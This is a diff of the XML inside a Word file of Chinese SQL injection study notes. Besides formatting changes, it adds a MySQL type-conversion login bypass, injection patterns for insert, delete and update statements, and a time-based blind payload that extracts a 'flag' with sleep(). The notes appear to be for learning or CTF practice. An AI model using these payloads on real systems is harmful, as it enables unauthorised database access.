     <w:basedOn w:val="3Char"/>
-    <w:link w:val="3"/>
+    <w:link w:val="31"/>
     <w:rsid w:val="006B12EC"/>
     <w:rPr>
       <w:b w:val="0"/>
@@ -32810,6 +33026,51 @@
     <w:rPr>
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3">
+    <w:name w:val="笔记3级标"/>
+    <w:basedOn w:val="10"/>
+    <w:next w:val="my"/>
+    <w:link w:val="3Char1"/>
+    <w:qFormat/>
+    <w:rsid w:val="00CA0CA4"/>
+    <w:pPr>
+      <w:numPr>
+        <w:numId w:val="46"/>
+      </w:numPr>
+      <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:b w:val="0"/>
+      <w:bCs/>
+      <w:sz w:val="21"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="3Char1">
+    <w:name w:val="笔记3级标 Char"/>
+    <w:basedOn w:val="3Char"/>
+    <w:link w:val="3"/>
+    <w:rsid w:val="00CA0CA4"/>
+    <w:rPr>
+      <w:b w:val="0"/>
+      <w:bCs/>
+      <w:kern w:val="44"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="44"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="my">
+    <w:name w:val="my正文"/>
+    <w:basedOn w:val="a"/>
+    <w:qFormat/>
+    <w:rsid w:val="00812AAA"/>
+    <w:pPr>
+      <w:ind w:firstLineChars="200" w:firstLine="200"/>
+    </w:pPr>
+    <w:rPr>
+      <w:szCs w:val="21"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/2.sql injection/sql注入笔记.docx
+++ b/2.sql injection/sql注入笔记.docx
@@ -17378,9 +17378,6 @@
       <w:pPr>
         <w:pStyle w:val="my"/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -17412,8 +17409,6 @@
         </w:rPr>
         <w:t>注入，这里只列出了几种。</w:t>
       </w:r>
-      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -17836,11 +17831,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -23234,7 +23224,221 @@
         <w:t>’\xbf\x27’</w:t>
       </w:r>
     </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>利用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>类型转换特性绕过</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>当执行</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">select * from table where </w:t>
+      </w:r>
+      <w:r>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’a’=’a’;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>时，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>根据约定从左向右执行，所以先执行</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>username=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’a’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>一般该值为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。此时</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句变为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">select * from table where </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>false=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’a’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>接着再计算时，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>将等号两边都转为数字后再比较。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>alse</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>转为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’a’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>也转为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，所以等式成立。最终语句变为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>select * from table where true;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，形成万能密码注入绕过。</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="46"/>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
@@ -23272,7 +23476,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -24055,6 +24258,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="091B20AD" wp14:editId="70C14F3B">
             <wp:extent cx="5274310" cy="1325846"/>
@@ -24113,7 +24317,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>HPP</w:t>
       </w:r>
       <w:r>
@@ -24483,10 +24686,10 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:45.05pt" o:ole="">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.55pt;height:45.05pt" o:ole="">
             <v:imagedata r:id="rId54" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1560668734" r:id="rId55"/>
+          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1561830108" r:id="rId55"/>
         </w:object>
       </w:r>
       <w:r>
@@ -24814,6 +25017,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>括号：</w:t>
       </w:r>
       <w:r>
@@ -24969,7 +25173,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>单引号：</w:t>
       </w:r>
       <w:r>
@@ -25572,6 +25775,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>2.</w:t>
       </w:r>
       <w:r>
@@ -25677,7 +25881,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>等价</w:t>
       </w:r>
       <w:r>
@@ -26449,6 +26652,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b w:val="0"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>current_user</w:t>
             </w:r>
             <w:r>
@@ -26680,7 +26884,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b w:val="0"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>@@datadir</w:t>
             </w:r>
           </w:p>
@@ -28057,6 +28260,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>提交的数据被过滤掉了，此时可以考虑使用</w:t>
       </w:r>
       <w:r>
@@ -28085,7 +28289,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>攻击：</w:t>
       </w:r>
     </w:p>
@@ -28860,7 +29063,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>在</w:t>
       </w:r>
       <w:r>

--- a/2.sql injection/sql注入笔记.docx
+++ b/2.sql injection/sql注入笔记.docx
@@ -21751,7 +21751,418 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:t>针对</w:t>
+      </w:r>
+      <w:r>
+        <w:t>DML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句的注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>不仅是</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>select</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>delete</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>update</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>insert</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句同样可以进行注入。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>对于这类</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>DML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句的注入，一般方法都是将</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>语句构造成“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>or (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>子查询语句</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”的形式。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="63"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
+        <w:t>二次查询注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中没有二次查询，所以采用子查询。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="64"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>注入语法</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Insert</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>insert into table</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (c1,c2,c3) values (v1,’test’ or</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [sql </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>selec</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">t </w:t>
+      </w:r>
+      <w:r>
+        <w:t>cmd], v3);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Delete</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">delete </w:t>
+      </w:r>
+      <w:r>
+        <w:t>from table where c1=v1 or</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [sql </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>selec</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">t </w:t>
+      </w:r>
+      <w:r>
+        <w:t>cmd];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Update</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">update table </w:t>
+      </w:r>
+      <w:r>
+        <w:t>set c1=v1 or</w:t>
+      </w:r>
+      <w:r>
+        <w:t>/and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> [sql </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>selec</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">t </w:t>
+      </w:r>
+      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="46"/>
+      <w:r>
+        <w:t>cmd];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>示例</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Insert</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="my"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>insert</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> into </w:t>
+      </w:r>
+      <w:r>
+        <w:t>client_ip (ip) values ('asd' or (select case when (substring((select flag f</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rom flag ) from 1 for 1 )='w</w:t>
+      </w:r>
+      <w:r>
+        <w:t>') then sleep(5) else sleep(0) end))#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>updatexml()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>extrac</w:t>
+      </w:r>
+      <w:r>
+        <w:t>tvalue()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>name_const()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
         <w:t>访问操作系统</w:t>
       </w:r>
     </w:p>
@@ -22197,6 +22608,7 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:r>
@@ -22382,7 +22794,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>根据</w:t>
       </w:r>
       <w:r>
@@ -22393,12 +22804,6 @@
       <w:pPr>
         <w:pStyle w:val="2"/>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用</w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -23018,6 +23423,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>空白符编码绕过</w:t>
       </w:r>
     </w:p>
@@ -23251,9 +23657,6 @@
       <w:pPr>
         <w:pStyle w:val="my"/>
         <w:ind w:firstLine="420"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -23343,14 +23746,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">select * from table where </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>false=</w:t>
+        <w:t>select * from table where false=</w:t>
       </w:r>
       <w:r>
         <w:t>’a’</w:t>
@@ -23436,8 +23832,6 @@
         </w:rPr>
         <w:t>，形成万能密码注入绕过。</w:t>
       </w:r>
-      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23698,6 +24092,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -24258,7 +24653,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="091B20AD" wp14:editId="70C14F3B">
             <wp:extent cx="5274310" cy="1325846"/>
@@ -24636,6 +25030,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>DB</w:t>
       </w:r>
       <w:r>
@@ -24686,10 +25081,10 @@
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
           </v:shapetype>
-          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.55pt;height:45.05pt" o:ole="">
+          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:64.5pt;height:44.9pt" o:ole="">
             <v:imagedata r:id="rId54" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1561830108" r:id="rId55"/>
+          <o:OLEObject Type="Embed" ProgID="Acrobat.Document.11" ShapeID="_x0000_i1025" DrawAspect="Icon" ObjectID="_1562518015" r:id="rId55"/>
         </w:object>
       </w:r>
       <w:r>
@@ -25017,7 +25412,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>括号：</w:t>
       </w:r>
       <w:r>
@@ -25416,6 +25810,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>*</w:t>
       </w:r>
       <w:r>
@@ -25775,7 +26170,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>2.</w:t>
       </w:r>
       <w:r>
@@ -25970,6 +26364,62 @@
         <w:ind w:leftChars="300" w:left="630" w:firstLine="420"/>
       </w:pPr>
       <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>其他表示方式</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>(mysql)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="300" w:left="630" w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>substring(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>[string],[pos],[len]</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)==</w:t>
+      </w:r>
+      <w:r>
+        <w:t>substring([string] from [pos] for [len])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="300" w:left="630" w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+        <w:t>mid([string],[start])==mid([string] from [start])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:leftChars="300" w:left="630" w:firstLine="420"/>
+      </w:pPr>
+      <w:r>
         <w:t>@@user ==&gt; user()</w:t>
       </w:r>
     </w:p>
@@ -26048,6 +26498,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>数据拼接</w:t>
       </w:r>
       <w:r>
@@ -26652,7 +27103,6 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:b w:val="0"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>current_user</w:t>
             </w:r>
             <w:r>
@@ -27341,6 +27791,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>substr</w:t>
       </w:r>
       <w:r>
@@ -28260,7 +28711,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>提交的数据被过滤掉了，此时可以考虑使用</w:t>
       </w:r>
       <w:r>
@@ -28519,6 +28969,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>sqlmap</w:t>
       </w:r>
       <w:r>
@@ -32248,6 +32699,18 @@
   </w:num>
   <w:num w:numId="62">
     <w:abstractNumId w:val="15"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="63">
+    <w:abstractNumId w:val="15"/>
+    <w:lvlOverride w:ilvl="0">
+      <w:startOverride w:val="1"/>
+    </w:lvlOverride>
+  </w:num>
+  <w:num w:numId="64">
+    <w:abstractNumId w:val="5"/>
     <w:lvlOverride w:ilvl="0">
